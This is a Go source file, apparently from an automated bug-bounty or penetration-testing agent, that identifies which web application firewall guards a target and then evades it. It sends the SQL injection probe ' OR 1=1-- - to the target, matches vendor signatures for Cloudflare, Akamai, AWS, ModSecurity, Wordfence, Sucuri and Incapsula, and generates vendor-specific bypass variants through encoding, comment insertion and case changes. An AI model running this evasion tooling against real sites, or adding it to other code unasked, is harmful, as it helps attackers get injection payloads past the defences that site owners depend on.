package agent

import (
	"context"
	"net/http"
	"strings"
	"time"

	"github.com/bb-agent/mirage/internal/agent/base"
)

// WAFVendor identifies the WAF product protecting a target.
type WAFVendor string

const (
	WAFCloudflare  WAFVendor = "cloudflare"
	WAFAkamai      WAFVendor = "akamai"
	WAFAWSShield   WAFVendor = "aws_shield"
	WAFModSecurity WAFVendor = "modsecurity"
	WAFWordFence   WAFVendor = "wordfence"
	WAFSucuri      WAFVendor = "sucuri"
	WAFIncapsula   WAFVendor = "incapsula"
	WAFNone        WAFVendor = "none"
	WAFUnknown     WAFVendor = "unknown"
)

// WAFResult holds detection outcome and recommended bypass sets.
type WAFResult struct {
	Vendor     WAFVendor
	Confidence float64
	BypassSets []string          // recommended bypass technique sets
	Evidence   map[string]string
}

// wafProbe is an internal detection rule for a specific vendor.
type wafProbe struct {
	vendor      WAFVendor
	headerKeys  []string // header names whose presence indicates the WAF
	headerVals  []string // substrings to find in any header value
	bodyPhrases []string // substrings to find in the response body
	statusCodes []int    // suspicious status codes that raise confidence
	confidence  float64  // base confidence when matched
}

var wafProbes = []wafProbe{
	{
		vendor:      WAFCloudflare,
		headerKeys:  []string{"cf-ray", "cf-cache-status", "cf-request-id"},
		headerVals:  []string{"cloudflare"},
		bodyPhrases: []string{"access denied by cloudflare", "error 1010", "cloudflare ray id", "__cf_bm"},
		statusCodes: []int{403, 503},
		confidence:  0.95,
	},
	{
		vendor:      WAFAkamai,
		headerKeys:  []string{},
		headerVals:  []string{"akamaiGHost", "akamai"},
		bodyPhrases: []string{"reference #", "you don't have permission to access", "akamai"},
		statusCodes: []int{403},
		confidence:  0.90,
	},
	{
		vendor:      WAFAWSShield,
		headerKeys:  []string{"x-amzn-requestid", "x-amz-cf-id"},
		headerVals:  []string{"awselb", "aws"},
		bodyPhrases: []string{"request blocked", "aws waf"},
		statusCodes: []int{403},
		confidence:  0.85,
	},
	{
		vendor:      WAFModSecurity,
		headerKeys:  []string{},
		headerVals:  []string{"mod_security", "modsecurity"},
		bodyPhrases: []string{"mod_security", "modsecurity", "not acceptable", "this error was generated by mod_security"},
		statusCodes: []int{403, 406},
		confidence:  0.80,
	},
	{
		vendor:      WAFWordFence,
		headerKeys:  []string{},
		headerVals:  []string{"wordfence"},
		bodyPhrases: []string{"generated by wordfence", "wordfence", "your access to this site has been limited"},
		statusCodes: []int{403},
		confidence:  0.88,
	},
	{
		vendor:      WAFSucuri,
		headerKeys:  []string{"x-sucuri-id", "x-sucuri-cache"},
		headerVals:  []string{"sucuri"},
		bodyPhrases: []string{"sucuri websiteFirewall", "access denied - sucuri website firewall"},
		statusCodes: []int{403},
		confidence:  0.92,
	},
	{
		vendor:      WAFIncapsula,
		headerKeys:  []string{"x-iinfo", "x-cdn"},
		headerVals:  []string{"incapsula", "imperva"},
		bodyPhrases: []string{"incapsula incident id", "_incap_ses", "_utmz"},
		statusCodes: []int{403},
		confidence:  0.90,
	},
}

// detectionPayload is a well-known malicious string that triggers most WAFs.
const detectionPayload = `' OR 1=1-- -`

// FingerprintWAF probes targetURL with a known malicious payload and identifies the WAF vendor.
func FingerprintWAF(ctx context.Context, targetURL string) WAFResult {
	fc := base.NewFuzzClient()

	// First: baseline request to detect 403 on clean traffic (helps calibrate)
	_ = fc.Baseline(ctx, targetURL)

	// Send detection probe
	probeCtx, cancel := context.WithTimeout(ctx, 15*time.Second)
	defer cancel()
	result := fc.ProbeGET(probeCtx, targetURL, "inject", detectionPayload)

	if result.Error != nil {
		return WAFResult{Vendor: WAFUnknown, Confidence: 0, Evidence: map[string]string{
			"error": result.Error.Error(),
		}}
	}

	evidence := map[string]string{
		"status_code": strings.TrimSpace(strings.Join([]string{wafIntToStr(result.StatusCode)}, "")),
	}

	// Collect all header key/value pairs into a flat lowercase string for scanning.
	headerText := flattenHeaders(http.Header(result.Headers))
	bodyLower := strings.ToLower(result.Body)

	bestMatch := WAFResult{Vendor: WAFNone, Confidence: 0.1, Evidence: evidence}

	for _, probe := range wafProbes {
		score := 0.0
		matchCount := 0

		// Check header key presence
		for _, hk := range probe.headerKeys {
			canonical := http.CanonicalHeaderKey(hk)
			if _, ok := result.Headers[canonical]; ok {
				score += 0.3
				matchCount++
				evidence["header_key_"+hk] = "present"
			}
		}

		// Check header values
		for _, hv := range probe.headerVals {
			if strings.Contains(headerText, strings.ToLower(hv)) {
				score += 0.25
				matchCount++
				evidence["header_val_"+hv] = "matched"
			}
		}

		// Check body phrases
		for _, bp := range probe.bodyPhrases {
			if strings.Contains(bodyLower, strings.ToLower(bp)) {
				score += 0.35
				matchCount++
				evidence["body_phrase"] = bp
			}
		}

		// Check status code
		for _, sc := range probe.statusCodes {
			if result.StatusCode == sc && matchCount > 0 {
				score += 0.1
			}
		}

		if matchCount == 0 {
			continue
		}

		// Clamp to probe's max confidence
		conf := probe.confidence * score
		if conf > probe.confidence {
			conf = probe.confidence
		}

		if conf > bestMatch.Confidence {
			bestMatch = WAFResult{
				Vendor:     probe.vendor,
				Confidence: conf,
				BypassSets: wafBypassSets(probe.vendor),
				Evidence:   evidence,
			}
		}
	}

	// If we got a 403/406/429/503 with no vendor match, call it "unknown WAF"
	blocking := result.StatusCode == 403 || result.StatusCode == 406 ||
		result.StatusCode == 429 || result.StatusCode == 503
	if bestMatch.Vendor == WAFNone && blocking {
		bestMatch.Vendor = WAFUnknown
		bestMatch.Confidence = 0.4
		bestMatch.BypassSets = wafBypassSets(WAFUnknown)
	}

	return bestMatch
}

// WAFBypassPayloads returns WAF-specific bypass variants for a given base payload.
func WAFBypassPayloads(vendor WAFVendor, basePayload string) []string {
	switch vendor {
	case WAFCloudflare:
		return []string{
			strings.ReplaceAll(basePayload, "'", "%27"),
			strings.ReplaceAll(basePayload, " ", "/**/"),
			strings.ReplaceAll(strings.ToUpper(basePayload), " OR ", "||"),
			basePayload + "-- -",
			"%27%20OR%201%3D1--",
		}
	case WAFAkamai:
		return []string{
			strings.ReplaceAll(basePayload, " ", "+"),
			strings.ReplaceAll(basePayload, "'", "\\x27"),
			urlDoubleEncode(basePayload),
		}
	case WAFAWSShield:
		return []string{
			strings.ReplaceAll(basePayload, " OR ", "%20OR%20"),
			strings.ReplaceAll(basePayload, "'", "&#39;"),
			urlDoubleEncode(basePayload),
		}
	case WAFModSecurity:
		return []string{
			strings.ReplaceAll(basePayload, "OR", "/*!OR*/"),
			strings.ReplaceAll(basePayload, " ", "%09"),
			strings.ReplaceAll(basePayload, "'", "0x27"),
		}
	case WAFWordFence:
		return []string{
			strings.ReplaceAll(basePayload, "OR", "Or"),
			strings.ReplaceAll(basePayload, " ", "\t"),
			strings.ReplaceAll(basePayload, "'", "%27"),
		}
	case WAFSucuri:
		return []string{
			strings.ReplaceAll(basePayload, " ", "/**/"),
			strings.ReplaceAll(basePayload, "'", "%27"),
			strings.ToUpper(basePayload),
		}
	case WAFIncapsula:
		return []string{
			strings.ReplaceAll(basePayload, " ", "%20"),
			urlDoubleEncode(basePayload),
			strings.ReplaceAll(basePayload, "'", "\\'"),
		}
	default:
		return []string{
			urlDoubleEncode(basePayload),
			strings.ReplaceAll(basePayload, " ", "/**/"),
			strings.ReplaceAll(basePayload, "'", "%27"),
		}
	}
}

// wafBypassSets returns recommended bypass technique names for a vendor.
func wafBypassSets(vendor WAFVendor) []string {
	switch vendor {
	case WAFCloudflare:
		return []string{"url_encoding", "comment_insertion", "case_variation", "chunked_transfer"}
	case WAFAkamai:
		return []string{"double_encoding", "unicode_normalization", "header_manipulation"}
	case WAFAWSShield:
		return []string{"url_encoding", "header_injection", "json_parameter_pollution"}
	case WAFModSecurity:
		return []string{"comment_insertion", "case_variation", "null_byte", "version_comment"}
	case WAFWordFence:
		return []string{"case_variation", "whitespace_substitution", "url_encoding"}
	case WAFSucuri:
		return []string{"comment_insertion", "url_encoding", "case_variation"}
	case WAFIncapsula:
		return []string{"double_encoding", "url_encoding", "unicode_bypass"}
	default:
		return []string{"url_encoding", "comment_insertion", "double_encoding", "case_variation"}
	}
}

// flattenHeaders returns all header names and values as a single lowercase string.
func flattenHeaders(headers http.Header) string {
	var sb strings.Builder
	for name, vals := range headers {
		sb.WriteString(strings.ToLower(name))
		sb.WriteString(":")
		for _, v := range vals {
			sb.WriteString(strings.ToLower(v))
			sb.WriteString(" ")
		}
	}
	return sb.String()
}

// http_canonicalHeader converts a lowercase header name to canonical form (e.g. "cf-ray" -> "Cf-Ray").
func http_canonicalHeader(s string) string {
	parts := strings.Split(s, "-")
	for i, p := range parts {
		if len(p) > 0 {
			parts[i] = strings.ToUpper(p[:1]) + strings.ToLower(p[1:])
		}
	}
	return strings.Join(parts, "-")
}

// urlDoubleEncode percent-encodes s then percent-encodes the result.
func urlDoubleEncode(s string) string {
	var sb strings.Builder
	for _, c := range s {
		encoded := intToHexPct(int(c))
		for _, e := range encoded {
			sb.WriteString(intToHexPct(int(e)))
		}
	}
	return sb.String()
}

func intToHexPct(c int) string {
	if c < 0x10 {
		return "%0" + strings.ToUpper(intToHex(c))
	}
	return "%" + strings.ToUpper(intToHex(c))
}

func intToHex(n int) string {
	const hexChars = "0123456789abcdef"
	if n == 0 {
		return "0"
	}
	var res []byte
	for n > 0 {
		res = append([]byte{hexChars[n%16]}, res...)
		n /= 16
	}
	return string(res)
}

func wafIntToStr(n int) string {
	if n == 0 {
		return "0"
	}
	neg := false
	if n < 0 {
		neg = true
		n = -n
	}
	var digits []byte
	for n > 0 {
		digits = append([]byte{byte('0' + n%10)}, digits...)
		n /= 10
	}
	if neg {
		digits = append([]byte{'-'}, digits...)
	}
	return string(digits)
}
